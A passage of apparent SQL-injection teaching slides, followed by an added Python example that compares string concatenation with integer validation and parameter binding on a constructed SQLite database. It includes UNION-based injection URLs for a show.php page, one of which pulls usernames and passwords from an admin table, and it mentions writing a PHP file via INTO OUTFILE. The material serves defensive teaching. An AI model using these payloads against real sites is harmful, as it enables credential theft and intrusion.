news WHERE id=1
• show.php?id=1 union select 1,2,3
  – SELECT * FROM news WHERE id=1 union select 1,2,3
• show.php?id=-1 union select 1,2,3
  – SELECT * FROM news WHERE id=-1 union select 1,2,3
is equivalent to ( SELECT 0x666f6f )
  – show.php?id=-1 union select username,password,3 from admin where username like 0x2561646d25
• into outfile '/var/www/.a.php' cannot be done this way
  – What if you cannot write files?
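The id values shown above contain no quote characters, so quote escaping alone does not stop them when the parameter lands in a numeric context. The following is an added example, not code from the original slides: it uses SQLite as a stand-in for the MySQL backend, with hypothetical functions `show_vulnerable` and `show_hardened` and constructed table contents, to compare concatenation against integer validation plus parameter binding.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the MySQL backend behind show.php.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO news  VALUES (1, 'hello', 'first post');
        INSERT INTO admin VALUES ('admin', 'constructed-hash');
    """)
    return db

def show_vulnerable(db, id_param):
    # Quote escaping only, then concatenation into a numeric context.
    # The escaping never fires because the input needs no quotes.
    escaped = id_param.replace("'", "''")
    return db.execute("SELECT * FROM news WHERE id=" + escaped).fetchall()

def show_hardened(db, id_param):
    # Reject anything that is not a plain integer, then bind it as a parameter
    # so the value can never be parsed as SQL syntax.
    try:
        news_id = int(id_param, 10)
    except ValueError:
        return []
    return db.execute("SELECT * FROM news WHERE id=?", (news_id,)).fetchall()

# id values taken from the page (the second admin query is shortened to drop
# the MySQL-specific hex literal, which SQLite does not treat as a string).
PAYLOADS = [
    "1",
    "-1 union select 1,2,3",
    "-1 union select username,password,3 from admin",
]

def run():
    db = make_db()
    return {p: (show_vulnerable(db, p), show_hardened(db, p)) for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (weak, strong) in run().items():
        print(f"{payload!r}\n  concatenated: {weak}\n  bound:        {strong}")
```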